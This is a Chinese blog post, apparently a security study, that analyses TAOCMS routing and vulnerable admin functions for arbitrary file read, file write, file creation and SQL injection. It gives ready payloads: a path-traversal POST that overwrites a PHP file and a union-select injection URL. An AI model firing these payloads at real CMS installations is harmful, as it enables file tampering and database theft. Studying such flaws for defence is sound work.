当前位置: 首页 > news >正文

TAOCMS漏洞代码学习及分析

news 2025/5/16 20:08:56

路由规则

分为前台和后台,

前台在api.php中

<?php  
session_start();  
include('config.php');  
include(SYS_ROOT.INC.'common.php');  
$ctrl=$_REQUEST['ctrl'];  
$action=$_REQUEST['action'];  
$m=ucfirst($action);  
if(!in_array($m,array('Api','Comment')))die;  
$model=new $m();  
if (method_exists($m,$ctrl)) {  
$model->$ctrl();  
}

主要是判断m类参数是否有指定方法以及参数是否正确。

<?php  
session_start();  
include "../config.php";  
include "../include/common.php";  
$action=$_REQUEST['action'];  
$ctrl=$_REQUEST['ctrl'];  
$id=(array)$_REQUEST['id'];  
//请登录  
if(!Base::checkadmin()&&$ctrl!='login'&&$ctrl!='checkUser'){  
Base::showmessage('',"index.php?action=login",1);  
}  
$referInfo=parse_url($_SERVER['HTTP_REFERER']);  
$referHost=isset($referInfo['port'])?"{$referInfo['host']}:{$referInfo['port']}":$referInfo['host'];  
if($referHost !== $_SERVER['HTTP_HOST']&&$ctrl!='login'){  
Base::showmessage('refer error','admin.php?action=frame&ctrl=logout');  
}  
if(Base::catauth($action)){  
if(class_exists($action)){  
$model=new $action($action,$id);  
if (method_exists($action,$ctrl)) {  
$model->$ctrl();  
}  
}  
}  
?>

好像规则差不多,就是加了一个session验证,然后写法不太一样其他就差不多了。

任意文件读取

在file.php中的download函数中,

function download(){  
$info=pathinfo($this->path);  
header('Content-Disposition: attachment; filename="'.$info['basename'].'"');  
echo file_get_contents($this->realpath);  
}

可以看到这个函数没有对获取文件进行任何过滤。

并且在managefile中有对参数的输入
![[Pasted image 20250226225556.png]]
所以可以利用。

任意文件写入

一、直接使用save

同样位于File文件中

function save(){  
$path=$this->path;  
if(!is_writable($this->realpath))Base::showmessage('无保存权限');  
$filedata=get_magic_quotes_gpc()?Base::magic2word($_POST['filedata']):$_POST['filedata'];  
$status=file_put_contents($this->realpath,$filedata);  
if($status){  
Base::showmessage('保存成功','admin.php?action=file&ctrl=lists');  
}  
}

可以看到save函数并没有对文件内容及文件名称进行任何过滤,所以可以进行php文件写入及替换

name=data%2Finstall.lock&filedata=arbitrary+file+writing+test&action=file&ctrl=save&path=../../importantfile.php&Submit=%E4%BF%9D%E5%AD%98

任意文件上传

使用创建文件的create方法,可以进行创建文件,并且没有过滤

function create(){  
if(!$_GET['name']){  
Base::showmessage('请填写文件名/文件夹名');  
}  
$file=$this->realpath.'/'.$_GET['name'];  
if($_GET['isdir']==1){  
mkdir($file);  
$str='目录';  
}else{  
fopen($file,'a');  
$str='文件';  
}  
if(!is_writable($file))Base::showmessage('新建'.$str.'失败');  
$info=pathinfo($this->path.$_GET['name']);  
Base::showmessage('新建'.$str.'成功','admin.php?action=file&ctrl=lists&path='.$info['dirname']);  
}

可以通过
![[Pasted image 20250227195758.png]]

进行调用,create函数,进行文件上传

sql注入

function create(){  
header('Content-type: application/txt');  
header('Content-Disposition: attachment; filename="backup-'.date('Y-m-d').'.sql"');  
$backups='';  
$bulist=explode('|',$_GET['bulist']);  
foreach($bulist as $bus){  
$addsql=($bus=='cms'&&$_GET['from'])?' limit '.$_GET['from'].','.$_GET['to']:'';  
$sql='select *from '.TB.$bus.$addsql;  
$o=$this->db->query($sql);  
while($data=$this->db->fetch_array($o)){  
$colums='';  
$datas='';  
foreach($data as $key=>$v){  
$colums.=$key.',';  
$datas.="'".Base::safeword($v)."',";  
}  
$backups.= 'REPLACE INTO '.TB.$bus.' ('.substr($colums,0,-1).') VALUES('.substr($datas,0,-1).');'."\n";  
}  
}  
echo substr($backups,0,-2);  
}

可以看到这个create中bulist是可以自己上传的,并且直接进行了拼接。

/admin/admin.php?action=datastore&ctrl=create&bulist=admin+where+id=1+union+select+(user()),2,3,4,5,6,7,8
http://www.xdnf.cn/news/438427.html

相关文章:

  • 嵌入式自学第二十一天(5.14)
  • JVM 与云原生的完美融合:引领技术潮流
  • 【SpringBoot实战指南】集成Easy ES
  • OpenCV实现数字水印的相关函数和示例代码
  • QListWedget控件使用指南
  • 50. Pow(x, n)
  • 网络互联技术深度解析:理论、实践与进阶指南
  • stm32之FLASH
  • C++效率掌握之STL库:map set底层剖析及迭代器万字详解
  • 【node】如何把包发布到npm上
  • 3D 数据可视化系统是什么?具体应用在哪方面?
  • 【Linux网络】网络层
  • 微服务商城(1)开篇、服务划分
  • 77. 组合【 力扣(LeetCode) 】
  • AGI大模型(15):向量检索之调用ollama向量数据库
  • 视频图像压缩领域中 DCT 的 DC 系数和 AC 系数详解
  • 【JAVA常见数据类型】
  • 【工奥阀门科技有限公司】签约智橙PLM
  • 家用或办公 Windows 电脑玩人工智能开源项目配备核显的必要性(含 NPU 及显卡类型补充)
  • 基于RFSOC ZU28DR+DSP 6U VPX处理板
  • 适配华为昇腾 NPU 的交互式监控工具
  • Java问题排查常用命令行工具速查表
  • 深度学习中.cuda()、.eval()与no_grad详解
  • 【MySQL】日志缓冲区详解 以及 InnoDB内存结构总结
  • 解决docker alpine缺少字体的问题 Could not initialize class sun.awt.X11FontManager
  • 浅析 Golang 内存管理
  • Chrome安装最新vue-devtool插件
  • 国产免费工作流引擎star 6.5k,Warm-Flow升级1.7.2(新增案例和修复缺陷)
  • 【​​HTTPS基础概念与原理​】​​SSL/TLS协议演进史:从SSLv3到TLS 1.3
  • 嵌入式Linux Qt开发:2、Qt creator简单配置、Qt Designer使用以及信号槽机制使用